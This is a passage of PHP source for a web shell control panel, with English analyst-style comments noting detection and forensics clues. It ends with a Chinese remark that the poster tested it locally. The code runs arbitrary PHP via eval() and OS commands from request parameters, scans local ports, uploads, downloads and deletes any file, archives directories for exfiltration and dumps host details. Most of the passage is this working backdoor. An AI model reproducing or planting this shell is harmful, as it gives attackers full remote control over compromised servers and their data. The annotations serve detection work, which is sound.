$class,
$php,
$u,
$pre,
$next), $html);
die(sprintf('{"showfile":%s}', json_encode($code)));
}
// action=port: takes a comma-separated list of ports from request parameter `ports`, probes each
// one on 127.0.0.1 through $this->fsockopen() and returns the open/closed lists as JSON.
// $yes / $no stay undefined when no port falls into that group.
function port() {
$port = explode(',', I('ports'));
foreach ($port as $v) {
if (true == $this->fsockopen($v)) {
$yes[] = $v;
} else {
$no[] = $v;
}
}
$html = <<< code
<pre>
端口检测
=======================
服务器开放端口:{yes}
服务器关闭端口:{no}
=======================
</pre>
code;
$code = str_replace(array('{yes}', '{no}'), array(join(',', $yes), join(',', $no)), $html);
die(sprintf('{"showfile":%s}', json_encode($code)));
}
// Probes one TCP port on 127.0.0.1 using the built-in fsockopen() with a 1-second timeout.
// Returns true if the connection opened, false otherwise. The opened socket is not closed here.
function fsockopen($port) {
$fp = fsockopen("127.0.0.1", $port, $errno, $errstr, 1);
if (!$fp) {
return false;
}
return true;
}
// action=runphp: executes request parameter `codes` with eval(), captures whatever it prints
// and returns that output as JSON ("showfile").
// Detection: requests with action=runphp and a `codes` parameter.
function runphp() {
$codes = I('codes');
ob_start();
eval($codes);
$c = ob_get_clean();
die(sprintf('{"showfile":%s}', json_encode($c)));
}
// action=runcommand: runs request parameter `codes` as an operating-system command through the
// backtick operator and returns the captured output as JSON.
// Hardening note: the backtick operator is unavailable when shell_exec is listed in disable_functions.
function runcommand() {
$codes = I('codes');
ob_start();
echo `$codes`;
$c = ob_get_clean();
die(sprintf('{"showfile":%s}', json_encode($this->mbstring($c))));
}
// action=viewinfo: prints the output of PHP's built-in phpinfo() and exits.
function viewinfo() {
phpinfo();
exit;
}
// action=logout: clears the session via _logout(), redirects to the script's own URL
// (built from the Host header and KING_SELF) and ends with a JSON status 200 message.
function logout() {
_logout();
header('location:http://'.$_SERVER["HTTP_HOST"].'/'.KING_SELF);
die('{"status":"200","msg":"你已成功退出!"}');
}
// action=del: deletes the file whose hex-encoded path is in request parameter `file`
// (decoded with pack("H*") and passed through the platform's encoding helper).
function del() {
if (IS_WIN)
$file = I('file') ? $this->gbk_mbstring(pack("H*", I('file'))) : null;
else
$file = I('file') ? $this->mbstring(pack("H*", I('file'))) : null;
if (isset($file)) {
if (false == unlink($file)) {
die('{"msg":"对不起,您没有删除此文件的权限!"}');
} else {
$this->dump('成功删除文件!');
}
}
return;
}
// action=down: sends the file whose hex-encoded path is in request parameter `file` to the
// client via download(), if it exists. Any path readable by the PHP process can be requested.
function down() {
if (IS_WIN)
$filename = I('file') ? $this->gbk_mbstring(pack("H*", I('file'))) : null;
else
$filename = I('file') ? $this->mbstring(pack("H*", I('file'))) : null;
if (isset($filename)) {
if (file_exists($filename)) {
$this->download($filename);
}
}
return;
}
// action=linuxpkg: non-Windows only. Archives the currently browsed directory with
// `tar zcf <md5>.tar.gz <path>` through shell_exec(); the archive name is md5(uniqid()).
// Forensics: unexpected .tar.gz files with a 32-hex-character name in the script's working directory.
function linuxpkg() {
if (IS_WIN)
die('{"msg":"此功能仅限linux平台使用"}');
$disable_functions = ini_get('disable_functions');
// strpos() result is tested for truthiness, so a match at position 0 is not detected
if (strpos($disable_functions, 'shell_exec')) {
die('{"msg":"非常抱歉,命令行已被禁用,请使用左边的打包功能!"}');
}
$apath = pack('H*', $this->scriptroot()); // scriptroot() is defined outside this part of the file; its result is hex-decoded here
$path = $_SESSION['dirpath'];
$shell = sprintf('tar zcf %s.tar.gz %s', md5(uniqid()), $path); // $path is placed in the command line unquoted
shell_exec($shell);
$this->setpath($apath);
$this->dump('亲,恭喜您,打包成功!');
}
// action=packages: zips the currently browsed directory using ZipArchive. Collects the file
// tree with _scandir(), registers every path through tofile() (into $GLOBALS['addzips']) and
// lets addzip() write the archive; afterwards switches the browsed directory via setpath().
function packages() {
if (!class_exists('ZipArchive')) {
die('{"msg":"当前环境不支持打包!"}');
}
$c = $this->_scandir($this->mbstring($_SESSION['dirpath']));
array_walk_recursive($c, array($this, 'tofile'));
$res = $this->addzip();
if ($res) {
// Return to the directory given by scriptroot() (hex-decoded), where the archive was written
$apath = pack('H*', $this->scriptroot());
$this->setpath($apath);
$this->dump('亲,恭喜您,打包成功!');
}
}
// action=up: moves the browsed directory one level up (dirname of the session path, or of
// basedir() when none is stored), normalises backslashes to slashes and re-renders the listing.
function up() {
$path = !empty($_SESSION['dirpath']) ? $_SESSION['dirpath'] : $this->basedir();
$_SESSION['dirpath'] = str_replace('\\', '/', $this->setpath(dirname($path)));
$this->dump();
}
// Path encoding differs by platform: on Windows the gbk_mbstring() helper is used.
// action=view: `file` is a hex-encoded path. A directory becomes the new browsed directory and
// the listing is re-rendered; a regular file is rendered with show_source() (syntax-highlighted
// source) and returned as JSON ("showfile").
function view() {
if (IS_WIN)
$filename = I('file') ? $this->gbk_mbstring(pack("H*", I('file'))) : null;
else
$filename = I('file') ? $this->mbstring(pack("H*", I('file'))) : null;
if (is_dir($filename)) {
$this->setpath($filename);
$this->dump();
}
if (is_file($filename)) {
ob_start();
show_source($filename);
$contents = ob_get_clean();
echo sprintf('{"showfile":%s}', json_encode($this->mbstring($contents)));
}
}
// action=upload: stores the uploaded file (form field `userfile`) in the currently browsed
// directory under the base name sent by the client, with no check on type or extension, then
// answers with a small script that shows a success or failure notice in the parent frame.
// Warnings from the write are suppressed with @.
function upload() {
$path = !empty($_SESSION['dirpath']) ? $_SESSION['dirpath'] : $this->basedir();
if (true == @file_put_contents($path . '/' . basename($_FILES['userfile']['name']), file_get_contents($_FILES['userfile']['tmp_name']))) {
exit('
<script>
parent.$("#load").show();
parent.$("#load").text("上传成功,刷新当前页面即可!");
setTimeout(
function() {
parent.$("#load").hide();
}
, 2000);
</script>');
} else {
exit('<script>
parent.$("#load").show();
parent.$("#load").text("上传失败!");
setTimeout(
function() {
parent.$("#load").hide();
}
, 2000);
</script>');
}
}
// Renders the interface: JSON (with optional $msg) for XMLHttpRequest callers, a full HTML page
// otherwise. $msg is not used in the HTML branch.
protected function dump($msg = null) {
if (is_ajax()) {
$this->dump_ajax($msg);
} else {
$this->dump_html();
}
}
// start of the archive helpers
// Recursively lists $path. Returns an array in which each sub-directory contributes a nested
// array (its own listing) followed by the full paths of the files directly in $path.
// Paths pass through the gbk_mbstring()/mbstring() helpers defined outside this part of the file.
function _scandir($path) {
$path = $this->gbk_mbstring($path);
$class = new DirectoryIterator($path);
foreach ($class as $key => $fileinfo) {
if ($fileinfo->getFilename() == '.' || $fileinfo->getFilename() == '..')
continue;
if ($fileinfo->isFile()) {
$files[] = $this->mbstring($path) . '/' . $this->mbstring($fileinfo->
getFilename());
}
if ($fileinfo->isDir()) {
$dirs[] = $this->_scandir($path . '/' . $fileinfo->getFilename());
}
}
if (!isset($files))
$files = array();
if (!isset($dirs))
$dirs = array();
$return = array_merge($dirs, $files);
return $return;
}
// Normalises a path by replacing every backslash with a forward slash.
function trimpath($path) {
return str_replace('\\', '/', $path);
}
// array_walk_recursive() callback used by packages(): records one file for the archive in
// $GLOBALS['addzips'], as its full path plus an in-archive name obtained by removing this
// script's directory from the path and trimming leading slashes. $key is unused.
function tofile($item, $key) {
$GLOBALS['addzips'][] = array('pathname' => $item, 'filename' => ltrim(str_replace
($this->trimpath(dirname(__file__)), null, $item), '/'));
}
// Writes every entry of $GLOBALS['addzips'] into a new zip archive named md5(uniqid()).zip
// (relative path, so it lands in the process's working directory), skipping an entry whose base
// name equals the archive's. Removes the execution time limit first. Returns true on success and
// ends the request with a JSON message if the archive cannot be opened.
// Forensics: unexpected .zip files with a 32-hex-character name next to web content.
function addzip() {
set_time_limit(0);
$basename = md5(uniqid()) . '.zip';
$zip = new ZipArchive;
if (!is_file($basename))
$res = $zip->open($basename, ZipArchive::CREATE);
else
$res = $zip->open($basename);
if ($res === true) {
foreach ($GLOBALS['addzips'] as $add) {
if (basename($add['pathname']) == $basename)
continue;
$zip->addFile($this->gbk_mbstring($add['pathname']), $this->gbk_mbstring($add['filename']));
}
$zip->close();
} else {
die('{"msg":"不能创建打包程序,可能是目录没有读写权限!"}');
}
return true;
}
// end of the archive helpers
// Streams $filename to the client as an attachment: removes the execution time limit, sends
// no-cache and download headers (name and size taken from the file), then echoes the file
// line by line until end of file.
function download($filename) {
set_time_limit(0);
$file = new SplFileObject($filename);
header("Cache-Control: no-cache, must-revalidate");
header("Pragma: no-cache");
header("Content-Disposition: attachment; filename=" . $file->getbasename());
header("Content-Length: " . $file->getsize());
header("Content-Type: application/force-download");
header('Content-Description: File Transfer');
header('Content-Encoding: none');
header("Content-Transfer-Encoding: binary");
while (!$file->eof()) {
echo $file->fgets();
}
}
// Emits the interface as JSON for XMLHttpRequest callers: {"html": …} and, when $msg is
// given, a "msg" field. $msg is inserted into the JSON text without encoding.
protected function dump_ajax($msg = null) {
if ($msg) {
echo sprintf("{\"html\":%s,\"msg\":\"%s\"}", $this->ajax(), $msg);
} else {
echo sprintf("{\"html\":%s}", $this->ajax());
}
}
// Emits the interface as a full HTML page: takes the page from html() and substitutes the
// {menu} and {action} placeholders with the " | "-joined link lists.
protected function dump_html() {
$html = $this->html();
$menu = join(" | ", $this->menu());
$action = join(" | ", $this->action());
echo str_replace(array("{menu}", "{action}"), array($menu, $action), $html);
}
// Byte-level check of whether $str is laid out like UTF-8: each lead byte above 128 must be
// followed by the matching number of continuation bytes in the range 128..191.
// Returns false on the first violation, true otherwise.
// NOTE(review): the test is `$c > 128`, so byte value 128 itself is accepted as a single byte.
protected function is_utf8($str) {
$c = 0;
$b = 0;
$bits = 0;
$len = strlen($str);
for ($i = 0; $i < $len; $i++) {
$c = ord($str[$i]);
if ($c > 128) {
// derive the sequence length from the lead byte
if (($c >= 254))
return false;
elseif ($c >= 252)
$bits = 6;
elseif ($c >= 248)
$bits = 5;
elseif ($c >= 240)
$bits = 4;
elseif ($c >= 224)
$bits = 3;
elseif ($c >= 192)
$bits = 2;
else
return false;
// sequence would run past the end of the string
if (($i + $bits) > $len)
return false;
// every following byte must be a continuation byte
while ($bits > 1) {
$i++;
$b = ord($str[$i]);
if ($b < 128 || $b > 191)
return false;
$bits--;
}
}
}
return true;
}
// Formats a byte count as a human-readable string: divides by 1024 until the value is below
// 1024 and appends the matching unit, rounded to $dec decimals.
// NOTE(review): $pos is not bounded by the six units in $a.
protected function byte_format($size, $dec = 2) {
$a = array(
"B",
"KB",
"MB",
"GB",
"TB",
"PB");
$pos = 0;
while ($size >= 1024) {
$size /= 1024;
$pos++;
}
return round($size, $dec) . "" . $a[$pos];
}
// Assembles the full page of the logged-in interface: the class_html() skeleton with {body},
// {load_css} and {load_js} replaced by body(), css() and js().
protected function html() {
return str_replace(array(
'{body}',
'{load_css}',
'{load_js}'), array(
$this->body(),
css(),
js()), class_html());
}
// Returns the interface body (with {menu} and {action} filled in) as a JSON-encoded string,
// for use in the XMLHttpRequest response.
protected function ajax() {
$html = $this->body();
$menu = join(" | ", $this->menu());
$action = join(" | ", $this->action());
$body = str_replace(array("{menu}", "{action}"), array($menu, $action), $html);
return json_encode($body);
}
// Fills the class_body() template with host information and the file listing. Each placeholder
// is replaced by the result of the like-named helper method (host, ip, uname, soft, php_version,
// whoami, current_dir, space_total, all_dir, showfile); most of these helpers are defined outside
// the part of the file shown here.
protected function body() {
return str_replace(array(
'{host}',
'{ip}',
'{uname}',
'{software}',
'{php_version}',
'{whoami}',
'{current_dir}',
'{space_total}',
'{all_dir}',
'{showfile}',
), array(
$this->host(),
$this->ip(),
$this->uname(),
$this->soft(),
$this->php_version(),
$this->whoami(),
$this->current_dir(),
$this->space_total(),
$this->all_dir(),
$this->showfile(),
), class_body());
}
// Builds the top menu as a list of <a> elements (label, href, CSS class): logout, run command,
// port scan, run PHP, PHP settings, phpinfo, a "paid" MySQL placeholder, and, on Windows only,
// the restart entry. On other platforms the trailing null entry is removed again.
// The action names in these links (logout, phpinfo, viewinfo, restart) are what appears in
// access logs when the menu is used.
protected function menu() {
if (IS_WIN) {
$restart = array(
"重启系统",
KING_SELF . "?action=restart",
'action_del');
} else {
$restart = null;
$unset = true; // marks that the null placeholder must be dropped below
}
$menus = array(
array(
"退出",
KING_SELF . "?action=logout",
null),
array(
"运行命令",
'javascript:;;;',
'run_command'),
array(
"端口扫描",
'javascript:;;;',
'click_port'),
array(
"运行php",
'javascript:;;;',
'run_php'),
array(
"php参数",
KING_SELF . "?action=phpinfo",
'action_del'),
array(
"phpinfo",
KING_SELF . "?action=viewinfo",
null),
array(
"mysql管理(需付费购买)",
'javascript:;;;',
'pay'),
$restart,
);
if (isset($unset)) {
array_pop($menus);
}
foreach ($menus as $menu) {
$return[] = sprintf("<a class='%s' href=\"%s\">%s</a>", $menu[2], $menu[1], $menu[0]);
}
return $return;
}
// Builds the file-manager action bar as a list of <a> elements: jump to the web root, jump to
// the script directory, upload, new file, new folder, archive via PHP (action=packages), archive
// via tar (action=linuxpkg) and refresh. Paths in the links are hex strings (webroot() and
// scriptroot() are defined outside this part of the file; the refresh link uses bin2hex()).
protected function action() {
$menus = array(
array(
"网站目录",
KING_SELF . "?action=view&file=" . $this->webroot(),
'action_del'),
array(
"文件目录",
KING_SELF . "?action=view&file=" . $this->scriptroot(),
'action_del'),
array(
"上传文件",
'javascript:;;;',
'upload'),
array(
"新建文件",
"javascript:;;;",
'_newfile'),
array(
"新建文件夹",
"javascript:;;;",
'_newfolder'),
array(
"打包当前路径(php功能)",
KING_SELF . "?action=packages",
'action_del packages'),
array(
"打包当前路径(linux功能)",
KING_SELF . "?action=linuxpkg",
'action_del packages'),
array(
"刷新本页",
KING_SELF . "?action=view&file=" . bin2hex($_SESSION['dirpath']),
'action_del'),
);
foreach ($menus as $menu) {
$return[] = sprintf("<a class='%s' href=\"%s\">%s</a>", $menu[2], $menu[1], $menu[0]);
}
return $return;
}
/**
 * Renders the listing of one directory as concatenated HTML rows.
 *
 * Directories are listed first, then files; each row is the show_html()
 * template (defined elsewhere) with its placeholders filled in.
 *
 * Analyst note: every per-entry link carries the full path hex-encoded in the
 * "file" parameter, combined with action=rename, rmdir, down, editfile or del.
 * Those pairs in access logs show which files were downloaded, edited or
 * deleted through the panel once the hex is decoded.
 *
 * @param string|null $path hex-encoded directory path; when empty, basedir() is used
 * @return string all rows joined without a separator
 */
protected function showfile($path = null) {
// The caller-supplied path arrives hex-encoded and is decoded with pack('H*').
$pathname = empty($path) ? $this->basedir() : pack('H*', $path);
$filename = $this->scandir($pathname);
if (isset($filename['dirs'])) {
sort($filename['dirs']);
foreach ($filename['dirs'] as $key => $value) {
$basefile = $this->mbstring($pathname) . '/' . $value;
$dirs[$key] = str_replace(array(
'{self}',
'{file}',
'{return_file}',
'{return_time}',
'{return_size}',
'{return_chmod}',
'{return_perms}',
'{is_folder}',
), array(
KING_SELF,
bin2hex($basefile), //1
// The entry name is inserted as-is, without HTML escaping.
$value,
date('Y-m-d H:i:s', $this->filemtime($basefile)),
// Size column for directories is the literal "none".
'无',
// Last four octal digits of the mode, e.g. 0755.
substr(sprintf('%o', $this->fileperms($basefile)), -4),
$this->perms($basefile),
// Directory actions: "rename" and "delete" (rmdir).
sprintf('<a class="action_del" href="%s?action=rename&file=%s">重命名</a> | ',KING_SELF,bin2hex($basefile)).
sprintf('<a class="action_del" href="%s?action=rmdir&file=%s">删除</a>',KING_SELF,bin2hex($basefile)),
), show_html());
}
unset($key, $value, $basefile);
}
if (isset($filename['files'])) {
sort($filename['files']);
foreach ($filename['files'] as $key => $value) {
$basefile = $this->mbstring($pathname) . '/' . $value;
// This $color is not used in the replacement below; the row colour is
// assigned in the final loop of this method.
$color = ($key + 1) % 2 ? 'dd' : 'fff';
$files[$key] = str_replace(array(
'{self}',
'{file}',
'{return_file}',
'{return_time}',
'{return_size}',
'{return_chmod}',
'{return_perms}',
'{is_folder}',
'{.red}'), array(
KING_SELF,
bin2hex($basefile),
$value, //1
date('Y-m-d H:i:s', $this->filemtime($basefile)),
$this->byte_format($this->filesize($basefile)),
substr(sprintf('%o', $this->fileperms($basefile)), -4),
$this->perms($basefile),
// File actions: "download", "edit", a "rename" link with an empty href, "delete".
sprintf('<a href="%s?action=down&file=%s">下载</a> | ', KING_SELF, bin2hex($basefile)) .
sprintf('<a class="action_del" href="%s?action=editfile&file=%s">编辑</a>',KING_SELF,bin2hex($basefile)). ' | <a href="">重命名</a> | ' . sprintf(' <a class="action_del" href="%s?action=del&file=%s">删除</a>', KING_SELF, bin2hex($basefile)),
// The row whose name equals KING_SELF (presumably the panel's own file) is marked 'red'.
($value == KING_SELF) ? 'red' : null,
), show_html());
}
}
if (!isset($dirs))
$dirs = array();
if (!isset($files))
$files = array();
$arr = array_merge($dirs, $files);
// Alternate the {color} placeholder between 'fff' and 'dd' across the merged rows.
foreach ($arr as $k => $v) {
$color = ($k + 1) % 2 ? 'fff' : 'dd';
$res[] = str_replace(array('{color}'), array($color), $v);
}
// $res is only assigned inside the loop above, so it is undefined here when
// the directory has no entries.
return join(null, $res);
}
/**
 * Returns the web server's document root, with backslashes turned into
 * forward slashes, as a hex string suitable for the panel's "file" parameter.
 *
 * @return string hex encoding of $_SERVER["DOCUMENT_ROOT"]
 */
function webroot() {
return bin2hex(str_replace('\\', '/', $_SERVER["DOCUMENT_ROOT"]));
}
/**
 * Returns the directory that contains the running script, with backslashes
 * turned into forward slashes, as a hex string for the "file" parameter.
 *
 * @return string hex encoding of dirname($_SERVER["SCRIPT_FILENAME"])
 */
function scriptroot() {
return bin2hex(str_replace('\\', '/', dirname($_SERVER["SCRIPT_FILENAME"])));
}
/**
 * Wrapper around PHP's filemtime() that first passes the path through a
 * platform-specific helper: gbk_mbstring() when IS_WIN is truthy, mbstring()
 * otherwise. Both helpers are defined elsewhere; presumably they convert the
 * path's character encoding (to be confirmed against their definitions).
 *
 * @param string $path file or directory path
 * @return int|false whatever the built-in filemtime() returns
 */
protected function filemtime($path) {
if (IS_WIN)
$path = $this->gbk_mbstring($path);
else
$path = $this->mbstring($path);
// Unqualified call: this is the global filemtime(), not this method.
return filemtime($path);
}
/**
 * Wrapper around PHP's fileperms() that first passes the path through
 * gbk_mbstring() when IS_WIN is truthy and through mbstring() otherwise
 * (helpers defined elsewhere; presumably charset conversion).
 *
 * @param string $path file or directory path
 * @return int|false whatever the built-in fileperms() returns
 */
protected function fileperms($path) {
if (IS_WIN)
$path = $this->gbk_mbstring($path);
else
$path = $this->mbstring($path);
// Unqualified call: this is the global fileperms(), not this method.
return fileperms($path);
}
/**
 * Wrapper around PHP's filesize() that first passes the path through
 * gbk_mbstring() when IS_WIN is truthy and through mbstring() otherwise
 * (helpers defined elsewhere; presumably charset conversion).
 *
 * @param string $path file path
 * @return int|false whatever the built-in filesize() returns
 */
protected function filesize($path) {
if (IS_WIN)
$path = $this->gbk_mbstring($path);
else
$path = $this->mbstring($path);
// Unqualified call: this is the global filesize(), not this method.
return filesize($path);
}
/**
 * Formats a path's mode as an "ls -l" style string such as "drwxr-xr-x".
 *
 * The first character is the file type taken from the high bits of the mode;
 * the remaining nine are the owner/group/other rwx triplets, with the setuid,
 * setgid and sticky bits shown in the execute positions.
 *
 * @param string $path file or directory path
 * @return string ten-character mode string, or nine question marks when the
 *                file type is not recognised
 */
protected function perms($path) {
// Same path preparation as the filemtime()/fileperms()/filesize() wrappers.
if (IS_WIN)
$path = $this->gbk_mbstring($path);
else
$path = $this->mbstring($path);
$perms = fileperms($path);
// File type: socket, symlink, regular file, block device, directory,
// character device, FIFO, in that order.
if (($perms & 0xC000) == 0xC000) {
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
$info = 'p';
} else {
// Unknown type: return early, without the permission bits.
$info = '?????????';
return $info;
}
// Owner: 0x0800 is setuid ('s' with execute, 'S' without).
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms &
0x0800) ? 'S' : '-'));
// Group: 0x0400 is setgid ('s' with execute, 'S' without).
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms &
0x0400) ? 'S' : '-'));
// Other: 0x0200 is the sticky bit ('t' with execute, 'T' without).
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms &
0x0200) ? 'T' : '-'));
return $info;
}
/**
 * Remembers the directory being browsed in $_SESSION['dirpath'].
 *
 * @param string $path directory path to store
 * @return string the same path, unchanged
 */
protected function setpath($path) {
$_SESSION['dirpath'] = $path;
return $path;
}
/**
 * Returns the rendering of the current directory for the overview section.
 *
 * Uses $_SESSION['dirpath'] when it is non-empty, otherwise basedir(), and
 * hands the path to dirpath() (defined elsewhere, not visible here).
 *
 * @return mixed whatever dirpath() returns
 */
protected function current_dir() {
$path = !empty($_SESSION['dirpath']) ? $_SESSION['dirpath'] : $this->basedir();
return $this->dirpath($path);
}
/**
 * Resolves the starting directory and stores it in the session.
 *
 * Uses $_SESSION['dirpath'] when it is non-empty; otherwise the directory of
 * this script file, with backslashes turned into forward slashes.
 *
 * @return string the resolved directory path
 */
protected function basedir() {
$path = !empty($_SESSION['dirpath']) ? $_SESSION['dirpath'] : str_replace('\\', '/', dirname(__file__));
// Side effect: writes the result back to $_SESSION['dirpath'].
$this->setpath($path);
return $path;
}
/**
 * Returns the top-level location links for the overview section: drive
 * letters via scanwindows() when IS_WIN is truthy, otherwise the directories
 * under "/" via scanlinux().
 *
 * @return string|null HTML links joined by " | "; null when scanlinux() bails out
 */
protected function all_dir() {
if (!IS_WIN) {
return $this->scanlinux();
} else {
return $this->scanwindows();
}
}
/**
 * Lists the directories directly under "/" as HTML links.
 *
 * Returns nothing when the open_basedir ini setting is non-empty, i.e. the
 * root listing is skipped on hosts that restrict PHP's filesystem access.
 *
 * @return string|null links joined by " | ", or null when open_basedir is set
 */
protected function scanlinux() {
if (ini_get('open_basedir'))
return;
$pathname = '/';
// Second argument true selects the "directory links" mode of $this->scandir().
return $this->scandir($pathname, true);
}
/**
 * Probes drive letters A to Z and returns a link for each one that exists.
 *
 * Each link points at "?action=view&file=<hex of 'X:'>" on KING_SELF.
 *
 * @return string links joined by " | "
 */
protected function scanwindows() {
$range = range('A', 'Z');
foreach ($range as $dir) {
if (is_dir(sprintf('%s:', $dir))) {
$dirs[] = sprintf('<a class="action_del" href="%s?action=view&file=%s">%s</a>', KING_SELF, bin2hex($dir . ':'), $dir);
}
}
// $dirs is only assigned inside the loop, so it is undefined here if no
// drive letter passed is_dir().
return join(' | ', $dirs);
}
/**
 * Lists one directory, in one of two output modes.
 *
 * With $dir true the result is an HTML string of links to the sub-directories
 * (used for the root overview); otherwise it is an array with the keys
 * 'dirs' and 'files' holding entry names. The built-in scandir() is tried
 * first and DirectoryIterator is the fallback.
 *
 * Analyst note: the checks against the disable_functions ini setting show the
 * sample adapting to hardened PHP configurations rather than failing.
 *
 * @param string $path directory to list
 * @param bool   $dir  true for the HTML link mode, false for the array mode
 * @return string|array see above
 */
protected function scandir($path, $dir = false) {
// !strpos() is true both when 'scandir' is absent from disable_functions and
// when it is found at offset 0, and it is a substring match, not a list match.
if ($dir == true && !strpos(ini_get('disable_functions'), 'scandir')) {
// Unqualified call: this is the global scandir(), not this method.
$class = scandir($path);
foreach ($class as $key => $fileinfo) {
if ($fileinfo == '.' || $fileinfo == '..')
continue;
if (is_dir($path . '/' . $fileinfo)) {
// The link target is '/' plus the entry name, not $path plus the name, so
// it only matches the real location when $path is the root.
$files[] = sprintf('<a class="action_del" href="%s?action=view&file=%s">%s</a>', KING_SELF, bin2hex('/' . str_replace('\\', '/', $fileinfo)), str_replace('\\', '/', $fileinfo));
}
}
return join(' | ', $files);
}
// Try scandir() first
if (!strpos(ini_get('disable_functions'), 'scandir')) {
$root = scandir($path);
foreach ($root as $key => $value) {
if ($value == '.' || $value == '..')
continue;
if (is_dir($path . '/' . $value)) {
$dirs[] = $this->mbstring(str_replace('\\', '/', $value));
}
if (is_file($path . '/' . $value)) {
$files[] = $this->mbstring(str_replace('\\', '/', $value));
}
}
// $dirs / $files are only assigned inside the loop; either may be undefined
// here when the directory holds no entry of that kind.
return array('dirs' => $dirs, 'files' => $files);
}
// Fallback when the scandir check above did not pass: iterate with SPL.
$class = new DirectoryIterator($path);
if ($dir == true) {
foreach ($class as $key => $fileinfo) {
if ($fileinfo->getFilename() == '.' || $fileinfo->getFilename() == '..')
continue;
if ($fileinfo->isDir()) {
$files[] = sprintf('<a class="action_del" href="%s?action=view&file=%s">%s</a>', KING_SELF, bin2hex('/' . str_replace('\\', '/', $fileinfo->getFilename())), str_replace('\\', '/', $fileinfo->getFilename()));
}
}
return join(' | ', $files);
}
foreach ($class as $key => $fileinfo) {
if ($fileinfo->getFilename() == '.' || $fileinfo->getFilename() == '..')
continue;
if ($fileinfo->isFile()) {
$files[] = $this->mbstring(str_replace('\\', '/', $fileinfo->getFilename()));
}
if ($fileinfo->isDir()) {
$dirs[] = $this->mbstring(str_replace('\\', '/', $fileinfo->getFilename()));
}
}
return array('dirs' => $dirs, 'files' => $files);
}
/**
 * Returns the total size of the filesystem holding the current directory,
 * formatted by byte_format() (defined elsewhere).
 *
 * The path is $_SESSION['dirpath'] when non-empty, otherwise the directory of
 * this script file.
 *
 * @return mixed '0B' when disk_total_space is listed in disable_functions,
 *               otherwise whatever byte_format() returns
 */
protected function space_total() {
$path = !empty($_SESSION['dirpath']) ? $_SESSION['dirpath'] : dirname(__file__);
// The ini value is split on ',' without trimming, so an entry written with
// surrounding whitespace would not match the in_array() test below.
$dis = explode(',', ini_get('disable_functions'));
if (in_array('disk_total_space', $dis)) {
return '0B';
}
return $this->byte_format(disk_total_space($path));
}
//拆解当前路径
本地测试了一下功能,点评下:功能太尼玛简单咯
